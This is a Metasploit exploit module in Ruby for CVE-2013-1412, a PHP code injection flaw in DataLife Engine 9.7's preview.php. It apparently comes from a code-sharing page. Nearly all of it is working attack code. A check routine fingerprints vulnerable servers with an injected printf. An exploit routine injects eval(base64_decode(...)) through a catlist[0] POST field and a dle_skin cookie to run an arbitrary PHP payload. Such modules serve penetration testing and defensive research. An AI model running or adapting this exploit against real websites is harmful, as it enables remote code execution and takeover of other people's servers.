Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'DataLife Engine preview.php PHP Code Injection',
14
      'Description'    => %q{
15
          This module exploits a PHP code injection vulnerability DataLife Engine 9.7.
16
        The vulnerability exists in preview.php, due to an insecure usage of preg_replace()
17
        with the e modifier, which allows to inject arbitrary php code, when there is a
18
        template installed which contains a [catlist] or [not-catlist] tag, even when the
19
        template isn't in use currently. The template can be configured with the TEMPLATE
20
        datastore option.
21
      },
22
      'Author'         =>
23
        [
24
          'EgiX', # Vulnerability discovery
25
          'juan vazquez' # Metasploit module
26
        ],
27
      'License'        => MSF_LICENSE,
28
      'References'     =>
29
        [
30
          [ 'CVE', '2013-1412' ],
31
          [ 'OSVDB', '89662' ],
32
          [ 'EDB', '24438' ],
33
          [ 'BID', '57603' ],
34
          [ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ],
35
          [ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ]
36
        ],
37
      'Privileged'     => false,
38
      'Platform'       => ['php'],
39
      'Arch'           => ARCH_PHP,
40
      'Payload'        =>
41
        {
42
          'Keys'   => ['php']
43
        },
44
      'DisclosureDate' => '2013-01-28',
45
      'Targets'        => [ ['DataLife Engine 9.7', { }], ],
46
      'DefaultTarget'  => 0
47
      ))
48

49
    register_options(
50
      [
51
        OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]),
52
        OptString.new('TEMPLATE', [ true, "Template with catlist or not-catlit tag", "Default"])
53
      ])
54
  end
55

56
  def uri
57
    normalize_uri(target_uri.path, 'engine', 'preview.php')
58
  end
59

60
  def send_injection(inj)
61
    res = send_request_cgi(
62
      {
63
        'uri'       =>  uri,
64
        'method'    => 'POST',
65
        'vars_post' =>
66
          {
67
            'catlist[0]' => inj
68
          },
69
        'cookie'   => "dle_skin=#{datastore['TEMPLATE']}"
70
      })
71
    res
72
  end
73

74
  def check
75
    fingerprint = rand_text_alpha(4+rand(4))
76

77
    res = send_injection("#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//")
78

79
    if res and res.code == 200 and res.body =~ /#{fingerprint}/
80
      return Exploit::CheckCode::Vulnerable
81
    else
82
      return Exploit::CheckCode::Safe
83
    end
84
  end
85

86
  def exploit
87
    print_status("Exploiting the preg_replace() to execute PHP code")
88
    res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//")
89
  end
90
end
91

92